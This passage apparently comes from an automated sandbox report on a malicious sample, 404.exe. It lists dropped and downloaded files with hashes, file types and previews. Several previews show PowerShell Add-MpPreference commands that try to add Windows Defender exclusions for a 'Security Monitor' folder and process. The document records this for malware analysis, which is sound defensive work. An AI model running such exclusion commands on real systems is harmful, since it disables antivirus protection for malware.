                                                                                                                                                                                                                                                          SSDEEP:24:nt0vG74xdM/ko+3bdhXUnt0oxdM/ko+3bdhXUn:nt2s+3EntTs+3En
                                                                                                                                                                                                                                                          MD5:82AC9D66C12DB66A7B11616D6272EE70
                                                                                                                                                                                                                                                          SHA1:0CF1745B4CCF5AD2724252E4AA4795EEA02B98D9
                                                                                                                                                                                                                                                          SHA-256:2E9F5BFFEFD343DC1CACB0281503354CBF0983CBE33FD8672D46B83CBCE439B2
                                                                                                                                                                                                                                                          SHA-512:FCCE3DA264216151DEBA0FFE7D3E6FD586F799CC36FD0AD3767F3F76B9CBC5567115E390A039CA90E446F44A7C1B49EEDB25E7C2772950F33A5EB0B331ECFCF8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:add-mpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: .ConfigListExtension..At line:1 char:1.+ add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827 ....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .add-mpPreference : Operation failed with the following error: 0x%1!x!.At line:1 char:1.+ add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827 ....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):937
                                                                                                                                                                                                                                                          Entropy (8bit):4.886334581018453
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:nt0vG74uEZj/ko+3bdhXUnt0ouEZj/ko+3bdhXUn:nt2rT+3EntTrT+3En
                                                                                                                                                                                                                                                          MD5:FFF61011A1F9825A688F81389088CE9B
                                                                                                                                                                                                                                                          SHA1:3DA64B96C17BF4C65E4CEE084113806FDC643EC4
                                                                                                                                                                                                                                                          SHA-256:373DB8F54A4A96454377D1700B8F0F58EE15B4549DCC9CAEC328F6A7CAF124A6
                                                                                                                                                                                                                                                          SHA-512:1770C0287CC51AAAA655D6E1937EC8D6794F9D14C2047E61EEAB46A988411BF866EBA3FCE906889CEFD9D2D31A2AEDED403ED6BDEDDFCBE917E95B65182EF3E2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:add-mpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: .ConfigListExtension..At line:1 char:1.+ add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{ ....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .add-mpPreference : Operation failed with the following error: 0x%1!x!.At line:1 char:1.+ add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{ ....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):937
                                                                                                                                                                                                                                                          Entropy (8bit):4.910532060752715
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:nt0vG74xdM/ko+3bdhXUnt0oxdM/ko+3bdhXUn:nt2s+3EntTs+3En
                                                                                                                                                                                                                                                          MD5:82AC9D66C12DB66A7B11616D6272EE70
                                                                                                                                                                                                                                                          SHA1:0CF1745B4CCF5AD2724252E4AA4795EEA02B98D9
                                                                                                                                                                                                                                                          SHA-256:2E9F5BFFEFD343DC1CACB0281503354CBF0983CBE33FD8672D46B83CBCE439B2
                                                                                                                                                                                                                                                          SHA-512:FCCE3DA264216151DEBA0FFE7D3E6FD586F799CC36FD0AD3767F3F76B9CBC5567115E390A039CA90E446F44A7C1B49EEDB25E7C2772950F33A5EB0B331ECFCF8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:add-mpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: .ConfigListExtension..At line:1 char:1.+ add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827 ....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .add-mpPreference : Operation failed with the following error: 0x%1!x!.At line:1 char:1.+ add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827 ....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):937
                                                                                                                                                                                                                                                          Entropy (8bit):4.886334581018453
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:nt0vG74uEZj/ko+3bdhXUnt0ouEZj/ko+3bdhXUn:nt2rT+3EntTrT+3En
                                                                                                                                                                                                                                                          MD5:FFF61011A1F9825A688F81389088CE9B
                                                                                                                                                                                                                                                          SHA1:3DA64B96C17BF4C65E4CEE084113806FDC643EC4
                                                                                                                                                                                                                                                          SHA-256:373DB8F54A4A96454377D1700B8F0F58EE15B4549DCC9CAEC328F6A7CAF124A6
                                                                                                                                                                                                                                                          SHA-512:1770C0287CC51AAAA655D6E1937EC8D6794F9D14C2047E61EEAB46A988411BF866EBA3FCE906889CEFD9D2D31A2AEDED403ED6BDEDDFCBE917E95B65182EF3E2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:add-mpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: .ConfigListExtension..At line:1 char:1.+ add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{ ....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .add-mpPreference : Operation failed with the following error: 0x%1!x!.At line:1 char:1.+ add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{ ....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):937
                                                                                                                                                                                                                                                          Entropy (8bit):4.910532060752715
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:nt0vG74xdM/ko+3bdhXUnt0oxdM/ko+3bdhXUn:nt2s+3EntTs+3En
                                                                                                                                                                                                                                                          MD5:82AC9D66C12DB66A7B11616D6272EE70
                                                                                                                                                                                                                                                          SHA1:0CF1745B4CCF5AD2724252E4AA4795EEA02B98D9
                                                                                                                                                                                                                                                          SHA-256:2E9F5BFFEFD343DC1CACB0281503354CBF0983CBE33FD8672D46B83CBCE439B2
                                                                                                                                                                                                                                                          SHA-512:FCCE3DA264216151DEBA0FFE7D3E6FD586F799CC36FD0AD3767F3F76B9CBC5567115E390A039CA90E446F44A7C1B49EEDB25E7C2772950F33A5EB0B331ECFCF8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:add-mpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: .ConfigListExtension..At line:1 char:1.+ add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827 ....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .add-mpPreference : Operation failed with the following error: 0x%1!x!.At line:1 char:1.+ add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827 ....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):937
                                                                                                                                                                                                                                                          Entropy (8bit):4.886334581018453
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:nt0vG74uEZj/ko+3bdhXUnt0ouEZj/ko+3bdhXUn:nt2rT+3EntTrT+3En
                                                                                                                                                                                                                                                          MD5:FFF61011A1F9825A688F81389088CE9B
                                                                                                                                                                                                                                                          SHA1:3DA64B96C17BF4C65E4CEE084113806FDC643EC4
                                                                                                                                                                                                                                                          SHA-256:373DB8F54A4A96454377D1700B8F0F58EE15B4549DCC9CAEC328F6A7CAF124A6
                                                                                                                                                                                                                                                          SHA-512:1770C0287CC51AAAA655D6E1937EC8D6794F9D14C2047E61EEAB46A988411BF866EBA3FCE906889CEFD9D2D31A2AEDED403ED6BDEDDFCBE917E95B65182EF3E2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:add-mpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: .ConfigListExtension..At line:1 char:1.+ add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{ ....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .add-mpPreference : Operation failed with the following error: 0x%1!x!.At line:1 char:1.+ add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{ ....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):457728
                                                                                                                                                                                                                                                          Entropy (8bit):6.59955980299879
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12288:oYP3U+DowYPZOobyfwOgM2evuRTQ8r5e:3knwGZO4ZBevgTQ
                                                                                                                                                                                                                                                          MD5:5E952525D9379E001F1714DE9E87B50D
                                                                                                                                                                                                                                                          SHA1:45A1F15E62D3BEBF80BFDE69B992448DA09369FA
                                                                                                                                                                                                                                                          SHA-256:81DE9F4EE9164358163C7F2200522E5C518D649ED6868CC6F27DB2B831F42DA4
                                                                                                                                                                                                                                                          SHA-512:FCCEFD5CEFA59AAE1CCF1DF61907720BFB753AA1A6094DCB9225BA0110172103980C77708B9BB36F9D329B890ECC3F279AEE325A780308E9AC127EDC99CF8D0D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................................... ....@..............................................................................(...0...L.......................e......................................................\............................text............................... ..`.itext.............................. ..`.data...T.... ......................@....bss.....5...@...........................idata...(.......*..................@....edata...............H..............@..@.reloc...e.......f...J..............@..B.rsrc....L...0...L..................@..@....................................@..@........................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                          Size (bytes):1286144
                                                                                                                                                                                                                                                          Entropy (8bit):6.249712908749164
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24576:EtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt54DTx9Ke:8qTytRFk6ek14h5
                                                                                                                                                                                                                                                          MD5:BFA3F09DEEE00832D000F497EC5B570A
                                                                                                                                                                                                                                                          SHA1:9D4ED9BB876E66258392AA51C9B1C0F67D38A6AE
                                                                                                                                                                                                                                                          SHA-256:F01CFA202969C9FE931CB95E47FF59700F9EB924014ED349E0A731B3B7327518
                                                                                                                                                                                                                                                          SHA-512:A89043F52655EB0E189A5A1F5D72BF049A855D1795D0FA0E66EA949FC6F20A5336154D4A3FC2F3480E132751963C6AF2A68806623EF0651D8CC513BE7E1DCE70
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W............................l........ ....@..........................p............@......@..............................@8...0...2................................................... .......................................................text............................... ..`.itext.............................. ..`.data...h0... ...2..................@....bss.....a...`.......0...................idata..@8.......:...0..............@....tls....<............j...................rdata....... .......j..............@..@.rsrc....2...0...4...l..............@..@....................................@..@........................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                          Size (bytes):381
                                                                                                                                                                                                                                                          Entropy (8bit):2.962388163484507
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:qTV2RUHWyoHyXSEXKankN8MWJVEcL/jVQXyGN/FyU5jVQX/F8hLBiXF8gXa2FF9G:qUUHW7SMN8aCGNQUgy2agqrw6TGCn
                                                                                                                                                                                                                                                          MD5:10C05094FD04448DF8F7E4B5889B387F
                                                                                                                                                                                                                                                          SHA1:660F618D1027554758E661FF1B9C09C99060701A
                                                                                                                                                                                                                                                          SHA-256:7B64566A717F6C85F00082FD83CFE1417A13A68339102CC4F8BD8998DB58A1F6
                                                                                                                                                                                                                                                          SHA-512:CA7AC6C74A2C209B01D0B39E85DC84B93D252E14234292921E73355FD2EC997E58BE631E5F141C389633776740636E34F76543CF3F0FB09DD2D42D300152C961
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:Interface Statistics.... Received Sent....Bytes 2787301036 2051965576..Unicast packets 2440756 792460..Non-unicast packets 0 0..Discards 0 0..Errors 0 0..Unknown protocols 0..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\404.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7
                                                                                                                                                                                                                                                          Entropy (8bit):2.2359263506290326
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:SA:SA
                                                                                                                                                                                                                                                          MD5:B2B64FCA22FEA8F710AD9C3E70FF7950
                                                                                                                                                                                                                                                          SHA1:D9FD44AB8A3F64175A53380B311B026007D8E148
                                                                                                                                                                                                                                                          SHA-256:87E634B55253A06A2628486472B7D6EF0C83E72E6C47559F9EDA528928652727
                                                                                                                                                                                                                                                          SHA-512:C38F5DB77DEC59620E1B4F88003A1CC3050C186A253649C258411C78B020B5DEC0DE9FC93BD6A0ADD03EF5351BC7C550AD2AA176AFFAC4BC446D5FF5BA8BD8DA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:404.exe
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 27077
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):7285
                                                                                                                                                                                                                                                          Entropy (8bit):7.964038684015041
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:TvxMGwo9hFNrNNXizl2Bcj94aps9y5aW2CHkz92mDXnjrVo75OKc:7aboh57AL94ly592CmFXidJc
                                                                                                                                                                                                                                                          MD5:F687E94F4D455BA119D2187B14A884AE
                                                                                                                                                                                                                                                          SHA1:5206BDA3E1959F6A7369D33171F9AF76F92C21E2
                                                                                                                                                                                                                                                          SHA-256:5D18275C9AC22E917CEA324C250F54D9F6A1899BAB0EFBDF3739A6AB181BE5A3
                                                                                                                                                                                                                                                          SHA-512:1EA801D2E9BD5C4A3FAD19776270D971A159B28B52AF0369D208D6FFC0A5F81BF0CD8B8CA2379B1C75E366694DBE4B1ED1C7CBB78137F61829A8AC38B54D93CA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/en-08b2a987.js
                                                                                                                                                                                                                                                          Preview:............n.V...Sp..v.ka....!..$.;..%.....*..6...,.J....'....{I.".K.v:."......fM..Iq..\....S...O..k......../....}...|......O]}.>.O.6u.a...GK..UE.3..usF..az.m...0.]...&o.[../..Y.L...i...0..U...0....M[.RwBy...8...Orq.>+..H..o:....o.f}t.>lRw...).O....J.3?o*.f..jrfu.0mX.K:m....U_..zN.M.([f.#{PWeM.w.\,...V..^...m.q..6u..../O..w..Y.*..{x.~QVV..w}.}x5|..q........v..a...J...H...I...~..o..5....._.......G.'.{.=k.F......>...|..}..T....6....e..TX..K......,g[.S.r..l..|."..O...-...G...i....`.XhN.....sIb..u...2k..K.i.WW....T.u.7,`.w..R.g.H.\Y.i.G....f.Z...mE...\.}...C>..ZgW.,..E....:gSR...N...*.,.8.).YV...nU..l;.M."18(...y...d..n.lV..[n.:............p.E[$..:..u.(.y..6.K.ErvR... Yy.....v..f.%..m%I.,....~..]z..W.l.$.E.Y3.L..@.J.:O.4....'S5..Kj....@W..,...N^..}.n....DLz..l....v...J3JJ..o.Q...^R8mY....&..[..<s..7a.Y.<c.r7.xV.N/.WE2...Vo$ci..Z..!../.b_.&.-N.en..7.|s...#.<.3.\....?.nY..;OVy.gxa....6....zy.t.j..;..V.K.?....m..o...X6.CI
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (1184)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1185
                                                                                                                                                                                                                                                          Entropy (8bit):5.12883411542056
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:tXpVrWpEqCFsoYkSwdmdgkvIEfE77N/VJpYvfEvp/7N7Oev:H5sbHoYVAkgEfi7bSf0J7p
                                                                                                                                                                                                                                                          MD5:5712F506A0802DFB152E99CC1021EEAF
                                                                                                                                                                                                                                                          SHA1:34A3770659421BBCE2AC882C21B59D51A6DF9D02
                                                                                                                                                                                                                                                          SHA-256:4CDBFB3A255C3D881C885043AD25EF68BDFD324746706DA6DB3C0D077C90348B
                                                                                                                                                                                                                                                          SHA-512:74A4D892433E7A98298749F354B9462B3EF59725D338EC78167B4A299FF368292FA905FF5C229331A88506F695983C5A1FDA50BE323EDD768409C0BD6DA770D1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js
                                                                                                                                                                                                                                                          Preview:import{d as p,o as n,b as i,r as s,f as u,n as d,u as l,w as t}from"./index-004f4025.js";import{c as a}from"./Button.module-6d4e91b8.js";const f=["type","disabled","onClick"],m=["onClick"],k=p({__name:"Button",props:{size:{default:"md"},variant:{default:"default"},type:{default:"button"},loading:{type:Boolean},isInline:{type:Boolean,default:!1},disabled:{type:Boolean,default:!1},isCircle:{type:Boolean,default:!1},circleSize:{},hasShadow:{type:Boolean,default:!1},moreRounded:{type:Boolean,default:!1}},emits:["onClick"],setup(y,{emit:r}){const o=()=>{r("onClick")};return(e,c)=>e.isInline?(n(),i("span",{key:1,class:d([l(a).button,l(a)[e.size],l(a)[e.variant],{[l(a).loading]:e.loading,[l(a).inline]:e.isInline}]),onClick:t(o,["prevent"])},[s(e.$slots,"default")],10,m)):(n(),i("button",{key:0,type:e.type,disabled:e.disabled,style:u({width:`${e.circleSize}px`,height:`${e.circleSize}px`}),class:d([l(a).button,l(a)[e.size],l(a)[e.variant],{[l(a).loading]:e.loading,[l(a).inline]:e.isInline,[l(a)
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (612)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):613
                                                                                                                                                                                                                                                          Entropy (8bit):5.08267772798313
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:tGYt6XJqt4oiYk5xURvnYgdMVB1K7xNFn40EffoCT/evn:tGYt6XYt4oiYkXURvn7MRwxjifZ7ev
                                                                                                                                                                                                                                                          MD5:2DAF2E8244A82CE2D18896703255F110
                                                                                                                                                                                                                                                          SHA1:256AFE217B8C4014D87643C68AE6D53FA7DF59F5
                                                                                                                                                                                                                                                          SHA-256:7299EB78A78C169241ADE88D784BAE2EA7207E00CBC18A98C35DB237DD0EB144
                                                                                                                                                                                                                                                          SHA-512:B7BFCC34C3639A5B6A68E9D190D83894686413FCFA1E3242809D3F4ED6697BB25B2547176ECD03044753945A0E769CF513D61C69F274DE6926DD7BFF5B0229AD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:import{d as p,c as r,a as e,o as t,b as c,t as u,n as l,e as f,U as d}from"./index-004f4025.js";const k=p({__name:"Text",props:{oneRow:{type:Boolean,default:!1},bold:{type:Boolean,default:!1},text:{},size:{default:"sm"},color:{default:"default"},uppercase:{type:Boolean,default:!1},hoverLink:{type:Boolean,default:!1}},setup(n){const a=n,o=r(()=>[e.text,e[a.size],e[a.color],{[e.bold]:a.bold,[e.uppercase]:a.uppercase,[e.hoverLink]:a.hoverLink}]);return(s,i)=>s.oneRow?(t(),f(d,{key:1,class:l(o.value),text:s.text},null,8,["class","text"])):(t(),c("span",{key:0,class:l(o.value)},u(s.text),3))}});export{k as _};.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):97
                                                                                                                                                                                                                                                          Entropy (8bit):4.951184270366716
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:8yXjE9+eAIJ6GeNJ1VyumOw0/OUn:8yW6Gej1VTOU
                                                                                                                                                                                                                                                          MD5:3AA24E4B0CE2D0A271E1A193951B6655
                                                                                                                                                                                                                                                          SHA1:9F940B9FFAB5F9BAC8AAF68C1B5648FEE1D51E6E
                                                                                                                                                                                                                                                          SHA-256:FD9601A773EAEEA1B5B30EDA082FF58FD2CAFB341E6239069E87B8D5048DA2D8
                                                                                                                                                                                                                                                          SHA-512:B654D3ABF5C5DEA0561B11058F22B9A052C8567E67ADCB73273B445D29ABAFC0DABD9D3D1E89816E551D2DD72EBC3C21571237D635AFCB6023FA6D3D1E2D76A9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/ButtonTemplate-fd9601a7.css
                                                                                                                                                                                                                                                          Preview:._6ptc-v1o{display:flex;justify-content:center;align-items:center;width:100%}.eTUt1vSM{gap:.4em}.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2465)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):2466
                                                                                                                                                                                                                                                          Entropy (8bit):5.426086826070174
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:Je9Al3AZl1K2ltbPCPZQAtXAL7APmHmT84Rtj09LOv:Jl3AZXKYtrA+AtXAvAPsmwStjH
                                                                                                                                                                                                                                                          MD5:97ED63B4A13DD52ED16E3FA72D9C8279
                                                                                                                                                                                                                                                          SHA1:EAF9127A88CF66BE486FCA25238B286269B75B79
                                                                                                                                                                                                                                                          SHA-256:CA236C001E8BB9D47FE833AF3F70E9A663E01BC967E5E89AE2F8EF82F5BE0929
                                                                                                                                                                                                                                                          SHA-512:C2B728D090AAE952E8365374EA723772C801C07C6C6E8F232C3ABF335149B3E6B4A3E8A37172B92372004FA160BD2B5FCDF6C73185255E72B7222A7CC22C6668
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/Button-ca236c00.css
                                                                                                                                                                                                                                                          Preview:.g1jDENuQ{display:flex;transition:.3s ease;border-radius:10px;-webkit-user-select:none;user-select:none;max-width:100%;text-align:center;cursor:pointer}.g1jDENuQ svg{transition:.3s ease}.kn3-jpa8{opacity:.8;cursor:progress!important}.pi1aSgqN{opacity:.4;cursor:not-allowed}.Yx2mIjN5{border:1px solid var(--primary);color:var(--primary)}.Yx2mIjN5 svg{fill:var(--primary)}.Yx2mIjN5:hover:not(.kn3-jpa8):not(.pi1aSgqN){background-color:var(--primary90);color:var(--app-text-inverse)}.Yx2mIjN5:hover:not(.kn3-jpa8):not(.pi1aSgqN) svg{fill:var(--app-text-inverse)}.GQTXnPVh{border:1px solid var(--card-border);color:var(--app-text);background-color:#fff}.GQTXnPVh svg{fill:var(--app-text)}.GQTXnPVh:hover:not(.kn3-jpa8):not(.pi1aSgqN) svg{fill:var(--app-text-secondary)}.Spt6Oo9A{border:1px solid var(--primary);color:var(--primary);background-color:#fff}.Spt6Oo9A svg{fill:var(--primary)}.Spt6Oo9A:hover:not(.kn3-jpa8):not(.pi1aSgqN) svg{fill:var(--primary80);border-color:var(--primary80)}.Spt6Oo9A:hove
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
